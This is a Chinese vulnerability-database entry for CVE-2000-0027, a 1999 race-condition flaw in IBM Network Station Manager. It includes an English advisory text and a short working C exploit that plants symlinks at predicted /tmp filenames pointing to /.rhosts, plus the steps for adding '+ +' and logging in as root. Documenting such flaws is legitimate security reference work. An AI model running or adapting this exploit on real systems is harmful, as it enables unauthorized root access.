IBM网站管理者竞争条件漏洞

IBM网站管理者竞争条件漏洞

漏洞ID 1105659 漏洞类型 竞争条件
发布时间 1999-12-27 更新时间 2005-05-02
图片[1]-IBM网站管理者竞争条件漏洞-安全小百科CVE编号 CVE-2000-0027
图片[2]-IBM网站管理者竞争条件漏洞-安全小百科CNNVD-ID CNNVD-199912-093
漏洞平台 Unix CVSS评分 6.2
|漏洞来源
https://www.exploit-db.com/exploits/19697
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199912-093
|漏洞详情
IBM网站管理者NetStation存在漏洞,本地用户利用该漏洞通过一个符号链接攻击获得特权。
|漏洞EXP
source: http://www.securityfocus.com/bid/900/info

IBM's Network Station Manager is a client/server application which facilitates management for IBM Network Stations. It is possible to locally gain root priviliges on hosts running the NetStation daemon. NetStation (which runs as root) creates temporary files in /tmp with predictable filenames based on a known partial filename and the current system time, creating a race condition which can lead to root compromise if the race is won. A symlink would have to be created with a correct predicted filename that points to (for example) /.rhosts, causing NetStation to write to it. The attacker would then add "+ +" to the file, chown root it and rlogin (or rsh in) as root.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/time.h>

void main() {

/* Change these paths */
char dest[20] = "/.rhosts";
char source[50] = "/usr/netstation/nsm/users/xnec/xnec.nsu";
char sourcesym[50] = "/usr/netstation/nsm/users/xnec/xnec.nsu";
long sec;
int i;
sec = time(0);
for (i = 0; i < 30; i++) {
sprintf(sourcesym, "%s%d", source, (sec + i));
symlink(dest,sourcesym);
}

}
|参考资料

来源:BID
名称:900
链接:http://www.securityfocus.com/bid/900
来源:BUGTRAQ
名称:19991227IBMNetStation/UnixWarelocalrootexploit
链接:http://www.securityfocus.com/archive/1/39962
来源:XF
名称:ibm-netstat-race-condition(5381)
链接:http://www.iss.net/security_center/static/5381.php

相关推荐: HPUX Sendmail拒绝服务漏洞

HPUX Sendmail拒绝服务漏洞 漏洞ID 1207068 漏洞类型 未知 发布时间 1999-04-19 更新时间 1999-04-19 CVE编号 CVE-1999-0684 CNNVD-ID CNNVD-199904-030 漏洞平台 N/A CV…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享